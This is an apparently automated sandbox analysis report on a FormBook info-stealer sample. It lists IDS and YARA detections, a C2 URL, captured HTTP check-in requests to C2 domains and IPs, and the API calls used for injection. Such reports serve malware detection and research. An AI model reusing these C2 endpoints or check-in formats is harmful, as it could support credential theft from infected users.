Source:	Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_00405E61 FindFirstFileA,FindClose,	0_2_00405E61
Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_0040548B
Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.knighttechinca.com/dxe/

Source: global traffic	HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 199.59.242.153 199.59.242.153

Source: Joe Sandbox View

ASN Name: BODIS-NJUS BODIS-NJUS

Source: global traffic	HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1Host: www.northsytyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1Host: www.shitarpa.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1Host: www.houseofsisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.northsytyle.com

Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmp	String found in binary or memory: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI
Source: 2435.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 2435.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: C:\Users\user\Desktop\2435.exe

Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405042

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00419D60 NtCreateFile,	1_2_00419D60
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00419E10 NtReadFile,	1_2_00419E10
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00419E90 NtClose,	1_2_00419E90
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00419F40 NtAllocateVirtualMemory,	1_2_00419F40
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00419D5A NtCreateFile,	1_2_00419D5A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00419E0A NtReadFile,	1_2_00419E0A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00419E8A NtClose,	1_2_00419E8A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00419F3A NtAllocateVirtualMemory,	1_2_00419F3A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_00AB98F0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_00AB9860
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,	1_2_00AB9840
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,	1_2_00AB99A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_00AB9910
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,	1_2_00AB9A20
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_00AB9A00
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,	1_2_00AB9A50
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,	1_2_00AB95D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,	1_2_00AB9540
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_00AB96E0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_00AB9660
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_00AB97A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,	1_2_00AB9780
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,	1_2_00AB9710
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB98A0 NtWriteVirtualMemory,	1_2_00AB98A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9820 NtEnumerateKey,	1_2_00AB9820
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00ABB040 NtSuspendThread,	1_2_00ABB040
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB99D0 NtCreateProcessEx,	1_2_00AB99D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9950 NtQueueApcThread,	1_2_00AB9950
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9A80 NtOpenDirectoryObject,	1_2_00AB9A80
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9A10 NtQuerySection,	1_2_00AB9A10
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00ABA3B0 NtGetContextThread,	1_2_00ABA3B0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9B00 NtSetValueKey,	1_2_00AB9B00
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB95F0 NtQueryInformationFile,	1_2_00AB95F0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9520 NtWaitForSingleObject,	1_2_00AB9520
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00ABAD30 NtSetContextThread,	1_2_00ABAD30
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9560 NtWriteFile,	1_2_00AB9560
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB96D0 NtCreateKey,	1_2_00AB96D0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9610 NtEnumerateValueKey,	1_2_00AB9610
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9670 NtQueryInformationProcess,	1_2_00AB9670
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9650 NtQueryValueKey,	1_2_00AB9650
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9FE0 NtCreateMutant,	1_2_00AB9FE0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9730 NtQueryVirtualMemory,	1_2_00AB9730
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00ABA710 NtOpenProcessToken,	1_2_00ABA710
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9760 NtOpenProcess,	1_2_00AB9760
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AB9770 NtSetInformationFile,	1_2_00AB9770
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00ABA770 NtOpenThread,	1_2_00ABA770
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_1_00419D60 NtCreateFile,	1_1_00419D60
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_1_00419E10 NtReadFile,	1_1_00419E10
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_1_00419E90 NtClose,	1_1_00419E90
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_1_00419F40 NtAllocateVirtualMemory,	1_1_00419F40
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779540 NtReadFile,LdrInitializeThunk,	9_2_04779540
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047795D0 NtClose,LdrInitializeThunk,	9_2_047795D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_04779660
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779650 NtQueryValueKey,LdrInitializeThunk,	9_2_04779650
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_047796E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047796D0 NtCreateKey,LdrInitializeThunk,	9_2_047796D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779710 NtQueryInformationToken,LdrInitializeThunk,	9_2_04779710
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779FE0 NtCreateMutant,LdrInitializeThunk,	9_2_04779FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779780 NtMapViewOfSection,LdrInitializeThunk,	9_2_04779780
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_04779860
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779840 NtDelayExecution,LdrInitializeThunk,	9_2_04779840
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_04779910
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047799A0 NtCreateSection,LdrInitializeThunk,	9_2_047799A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779A50 NtCreateFile,LdrInitializeThunk,	9_2_04779A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779560 NtWriteFile,	9_2_04779560
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0477AD30 NtSetContextThread,	9_2_0477AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779520 NtWaitForSingleObject,	9_2_04779520
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047795F0 NtQueryInformationFile,	9_2_047795F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779670 NtQueryInformationProcess,	9_2_04779670
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779610 NtEnumerateValueKey,	9_2_04779610
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0477A770 NtOpenThread,	9_2_0477A770
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779770 NtSetInformationFile,	9_2_04779770
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779760 NtOpenProcess,	9_2_04779760
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779730 NtQueryVirtualMemory,	9_2_04779730
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0477A710 NtOpenProcessToken,	9_2_0477A710
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047797A0 NtUnmapViewOfSection,	9_2_047797A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0477B040 NtSuspendThread,	9_2_0477B040
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779820 NtEnumerateKey,	9_2_04779820
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047798F0 NtReadVirtualMemory,	9_2_047798F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047798A0 NtWriteVirtualMemory,	9_2_047798A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779950 NtQueueApcThread,	9_2_04779950
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047799D0 NtCreateProcessEx,	9_2_047799D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779A20 NtResumeThread,	9_2_04779A20
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779A10 NtQuerySection,	9_2_04779A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779A00 NtProtectVirtualMemory,	9_2_04779A00
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779A80 NtOpenDirectoryObject,	9_2_04779A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04779B00 NtSetValueKey,	9_2_04779B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0477A3B0 NtGetContextThread,	9_2_0477A3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FC9E90 NtClose,	9_2_02FC9E90
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FC9E10 NtReadFile,	9_2_02FC9E10
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FC9F40 NtAllocateVirtualMemory,	9_2_02FC9F40
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FC9D60 NtCreateFile,	9_2_02FC9D60
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FC9E8A NtClose,	9_2_02FC9E8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FC9E0A NtReadFile,	9_2_02FC9E0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FC9F3A NtAllocateVirtualMemory,	9_2_02FC9F3A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_02FC9D5A NtCreateFile,	9_2_02FC9D5A

Source: C:\Users\user\Desktop\2435.exe

Code function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040323C

Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_00404853	0_2_00404853
Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_00406131	0_2_00406131
Source: C:\Users\user\Desktop\2435.exe	Code function: 0_2_73351A98	0_2_73351A98
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041E1FC	1_2_0041E1FC
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041D260	1_2_0041D260
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041DA2A	1_2_0041DA2A
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041BDC4	1_2_0041BDC4
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00409E40	1_2_00409E40
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00409E3C	1_2_00409E3C
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041D6DF	1_2_0041D6DF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_0041DFA3	1_2_0041DFA3
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AA20A0	1_2_00AA20A0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B420A8	1_2_00B420A8
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A8B090	1_2_00A8B090
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B428EC	1_2_00B428EC
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B4E824	1_2_00B4E824
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A9A830	1_2_00A9A830
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B31002	1_2_00B31002
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A999BF	1_2_00A999BF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A94120	1_2_00A94120
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00A7F900	1_2_00A7F900
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B422AE	1_2_00B422AE
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B34AEF	1_2_00B34AEF
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B2FA2B	1_2_00B2FA2B
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAEBB0	1_2_00AAEBB0
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B223E3	1_2_00B223E3
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B3DBD2	1_2_00B3DBD2
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B303DA	1_2_00B303DA
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00AAABD8	1_2_00AAABD8
Source: C:\Users\user\Desktop\2435.exe	Code function: 1_2_00B42B28	1_2_00B42B28
